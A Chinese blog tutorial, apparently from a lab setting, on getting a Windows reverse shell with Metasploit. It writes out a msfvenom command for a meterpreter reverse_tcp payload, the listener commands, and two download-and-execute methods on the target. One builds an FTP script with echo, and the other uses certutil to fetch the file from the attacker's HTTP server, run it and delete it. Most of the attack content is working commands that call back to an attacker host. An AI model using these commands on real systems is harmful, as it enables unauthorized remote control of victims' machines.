利用msf在windows下反弹shell

靶机地址:10.0.3.146

攻击者地址:10.0.3.120

 

思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。

通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo)

首先利用kali生成一个shell,

命令:msfvenom -p windows/meterpreter_reverse_tcp lhost=10.0.3.120 lport=7070 -f exe -o /tmp/win.exe

 

方法一:

打开ftp服务器

利用msf的 auxiliary/server/ftp模块,只需要设置路径就好了

访问一下 访问到说明开启成功

 

成功后把这个job放入后台 ,命令是back

接下来先在kali中开启监听

命令:handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

现在去靶机上通过cmd命令下载win.exe并执行

cmd命令:echo open 10.0.3.120>ttt.txt&echo anonymous>>ttt.txt&echo whatever>>ttt.txt&echo binary>>ttt.txt&echo get jet.exe>>ttt.txt&echo bye>>ttt.txt&ftp -s:ttt.txt

执行后可以用dir命令看是否下载成功

之后执行jet.exe

得到反弹shell

进入sessions1 命令:sessions 1

获得meterpreter

方法二,

此方法也是要先生成一个shell,文章开头有写,不重复了。

开启http服务

命令:python -m SimpleHTTPServer 80(在需要的目录下快速开启)

访问

在msf下开启监听: handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

在靶机命令执行处执行

cmd.exe /c "certutil.exe -urlcache -split -f http://10.0.3.120/jet.exe &jet.exe &del jet.exe"

成功返回shell

 

  • 2
    点赞
  • 2
    收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一支神经病

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值